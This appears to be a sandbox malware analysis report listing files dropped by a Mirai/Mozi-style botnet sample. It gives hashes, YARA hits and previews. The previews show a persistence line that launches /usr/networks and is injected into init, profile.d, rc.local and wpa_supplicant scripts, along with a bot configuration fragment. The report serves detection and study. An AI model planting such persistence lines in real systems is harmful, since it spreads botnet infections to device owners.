                                                                                                                            Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/init.d/umountnfs.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):145
                                                                                                                            Entropy (8bit):4.730534942677594
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                                            MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                                            SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                                            SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                                            SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                                            /etc/profile.d/Z97-byobu.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/profile.d/apps-bin-path.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/profile.d/bash_completion.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/profile.d/cedilla-portuguese.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/profile.d/vte-2.91.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/rc.local
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOOR3n:M
                                                                                                                            MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                                            SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                                            SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                                            SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&.exit 0.
                                                                                                                            /etc/rcS.d/S95baby.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:POSIX shell script, ASCII text executable
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):25
                                                                                                                            Entropy (8bit):3.8936606896881854
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:TKH4v0VJ:hK
                                                                                                                            MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                            SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                            SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                            SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                            Malicious:true
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: MGuvcs6Ocz, Detection: malicious, Browse
                                                                                                                            • Filename: mozi.a.zip, Detection: malicious, Browse
                                                                                                                            • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                            • Filename: i, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                            • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                            • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                            • Filename: bad_file, Detection: malicious, Browse
                                                                                                                            • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                            • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                            Preview: #!/bin/sh./usr/networks&.
                                                                                                                            /etc/wpa_supplicant/action_wpa.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):714
                                                                                                                            Entropy (8bit):5.329653855555143
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                                            MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                                            SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                                            SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                                            SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                                            /etc/wpa_supplicant/functions.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /etc/wpa_supplicant/ifupdown.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3368
                                                                                                                            Entropy (8bit):5.3288648372922625
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                                            MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                                            SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                                            SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                                            SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                                            /tmp/.config
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):173
                                                                                                                            Entropy (8bit):4.908121595120361
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:x/HKRb+NWzBMSKtbUNNQSf9xO4NRzfqiQKaHunjbzAWCTTnQMN+d/L+Xqg3KN0:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+M
                                                                                                                            MD5:1021E0B7B7DE44145038C705865F9FF2
                                                                                                                            SHA1:5E7EC0275CA63E162238FE7A6AD7FD7485372427
                                                                                                                            SHA-256:9FF9646A48EE08E9A11D2653EDA13902B68BF4B429996184C21B1E67980D2980
                                                                                                                            SHA-512:841436B650B083FD4CFF76CBCDFE471F79A0F9EC26F43537BBBA1136769884338A9DC869AF81EEE289CCB6101375945877BA3E71F994E9925D99B1793CB6FD5B
                                                                                                                            Malicious:false
                                                                                                                            Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]1619016288.[rn]GET[/rn][sv]0[/sv]
                                                                                                                            /usr/bin/gettext.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1914
                                                                                                                            Entropy (8bit):4.829445473341419
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                                            MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                                            SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                                            SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                                            SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                                            /usr/networks
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):307960
                                                                                                                            Entropy (8bit):5.819679405566689
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                            MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                                            SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                                            SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                                            SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                                            • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                                            • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                            Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                                            /usr/sbin/alsa-info.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):25983
                                                                                                                            Entropy (8bit):5.455683610707543
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                                            MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                                            SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                                            SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                                            SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                                            Malicious:true
                                                                                                                            Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                                            /usr/share/alsa-base/alsa-info.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):25464
                                                                                                                            Entropy (8bit):5.453877096685684
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                                            MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                                            SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                                            SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                                            SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                                            /usr/share/alsa/utils.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4725
                                                                                                                            Entropy (8bit):5.44928341819888
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                                            MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                                            SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                                            SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                                            SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                                            /usr/share/brltty/initramfs/brltty.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):46
                                                                                                                            Entropy (8bit):3.925523369006428
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                            MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                            SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                            SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                            SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                            /usr/share/cups/braille/cups-braille.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:UTF-8 Unicode text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3551
                                                                                                                            Entropy (8bit):5.478748088887141
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                                            MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                                            SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                                            SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                                            SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                                            /usr/share/cups/braille/index.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):590
                                                                                                                            Entropy (8bit):5.080350031939274
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                                            MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                                            SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                                            SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                                            SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                                            Malicious:false
